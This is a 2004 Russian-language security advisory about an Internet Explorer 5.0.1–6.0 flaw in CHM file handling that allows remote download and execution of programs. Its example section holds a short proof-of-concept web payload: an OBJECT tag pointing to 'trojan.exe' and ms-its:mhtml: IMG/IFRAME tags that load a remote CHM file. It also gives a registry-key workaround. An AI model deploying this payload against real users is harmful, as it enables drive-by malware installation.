Security Lab

Автоматическая загрузка и выполнение произвольных фалов в Microsoft Internet Explorer

Дата публикации:24.02.2004
Всего просмотров:1505
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer 5.0.1-6.0

Описание: Уязвимость обнаружена в Microsoft Internet Explorer при обработке CHM файлов. Удаленный атакующий может автоматически загрузить и выполнить произвольные программы на целевом клиентне.

Пример:

LAUNCH.HTML:

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>
Чтобы запустить LAUNCH.HTML как CHM файл:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

URL производителя: http://www.Microsoft.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Удалите следующий ключ реестра:

HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its
Ссылки: Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658)